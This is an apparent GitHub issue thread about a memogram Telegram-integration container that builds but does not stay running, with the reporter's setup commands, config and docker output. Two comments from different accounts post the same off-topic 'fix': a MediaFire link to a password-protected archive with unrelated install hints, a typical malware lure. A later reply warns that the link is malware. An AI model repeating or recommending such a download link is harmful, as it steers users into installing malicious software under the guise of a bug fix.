### ISSUE TITLE
Does not run as docker container

### ISSUE THREAD

**Issue by VecH** [usememos/telegram-integration#52]
```
mkdir /opt/memogram
cd /opt/memogram
git clone https://github.com/usememos/telegram-integration memogram
```

`cat .env`
```
SERVER_ADDR=dns:localhost:5230
BOT_TOKEN=**********************
INSTANCE_URL=https://memos.domain.com
```

`cat docker-compose.yml`
```
services:
  memogram:
    env_file: .env
    build: memogram
    container_name: memogram
```

`docker compose up -d`
```
 => => naming to docker.io/library/memogram-memogram                                                                                                                                                                                    0.0s
[+] Running 2/2
 ✔ Network memogram_default  Created                                                                                                                                                                                                    0.5s
 ✔ Container memogram        Started
```
`docker ps | grep mem`
```
d1a709d6177f   neosmemo/memos:stable              "./memos"                4 weeks ago    Up 42 hours             127.0.0.1:5230->5230/tcp                    memos
```
**Only memos is running in a docker container**

`docker images|grep memo`
```
memogram-memogram                latest    293d260c87ca   11 minutes ago   24.5MB
neosmemo/memos                   stable    34de9e005158   4 weeks ago      63.8MB
```

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by VecH** [comment]
> to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in install to path and select "gcc."

What does this have to do with my docker container on linux?

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by alister** [comment]
A Warning about the above reply and the link to malware on mediafire (from the author of Curl): https://mastodon.social/@bagder/113038399943924413
